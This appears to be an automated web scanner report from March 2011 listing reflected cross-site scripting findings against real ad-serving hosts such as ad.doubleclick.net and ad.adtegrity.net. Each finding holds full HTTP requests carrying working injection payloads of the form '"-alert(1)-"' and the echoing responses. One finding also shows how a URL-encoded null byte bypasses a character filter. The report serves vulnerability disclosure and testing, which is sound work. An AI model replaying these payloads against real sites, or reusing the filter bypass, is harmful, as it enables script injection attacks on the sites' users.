User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 20 Mar 2011 18:55:11 GMT
Server: Apache
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM"
Set-Cookie: s1=4D864D8F636D0144; expires=Fri, 18-Mar-2016 18:55:11 GMT; path=/webde/webde-s/
Location: http://wa.ui-portal.de/webde/webde-s/41e09
f4b2c7153f2
?homepage.startseite.pi.home&ns_m2=yes&ns_setsiteck=4D864D8F636D0144&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211
Content-Length: 811
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wa.ui-portal.de/webde/webde-s/41e09
f4b
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 227 instances of this issue:


4.1. http://ad.adtegrity.net/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adtegrity.net
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27220"-alert(1)-"e1de420c95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=803366&27220"-alert(1)-"e1de420c95d=1 HTTP/1.1
Host: ad.adtegrity.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/300_1_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:29:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 20 Mar 2011 17:29:28 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adtegrity.net/imp?27220"-alert(1)-"e1de420c95d=1&Z=300x250&s=803366&_salt=1378450436";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d73"-alert(1)-"e256c65c434 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7321
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:48:16 GMT
Expires: Sun, 20 Mar 2011 14:48:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434http://ads.networksolutions.com/landing?code=P13C519S512N0B2A1D686E0000V100&promo=699DOMAINS");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

4.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a967c"-alert(1)-"3450cf13752 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 14:47:44 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 14:47:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7363

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
26AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS");
var fsc
...[SNIP]...

4.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9773"-alert(1)-"7d6db04947d was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=;ord=204549332? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 14:48:14 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 14:48:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7322

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
EtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae102"-alert(1)-"e83e49284e8 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 14:47:54 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 14:47:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7322

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
NjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS");
var fscUrl =
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009d689"-alert(1)-"d3bf0e85614 was submitted in the sig parameter. This input was echoed as 9d689"-alert(1)-"d3bf0e85614 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7292
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:48:06 GMT
Expires: Sun, 20 Mar 2011 14:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.43

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12e2"-alert(1)-"d2dd61e57b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 14:47:34 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 14:47:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7259

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/1d1/%2a/p%3B234427567%3B0-0%3B0%3B50265525%3B2321-160/600%3B38432112/38449869/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzg
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420e2"-alert(1)-"3ee7a7f2227 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4945
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:17:36 GMT
Expires: Sun, 20 Mar 2011 17:17:36 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
gEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah");
var wmode = "opaque";
var bg = "ffffff";
var dcallowscriptaccess = "n
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e99"-alert(1)-"97bc0f3b553 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQa8e99"-alert(1)-"97bc0f3b553&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
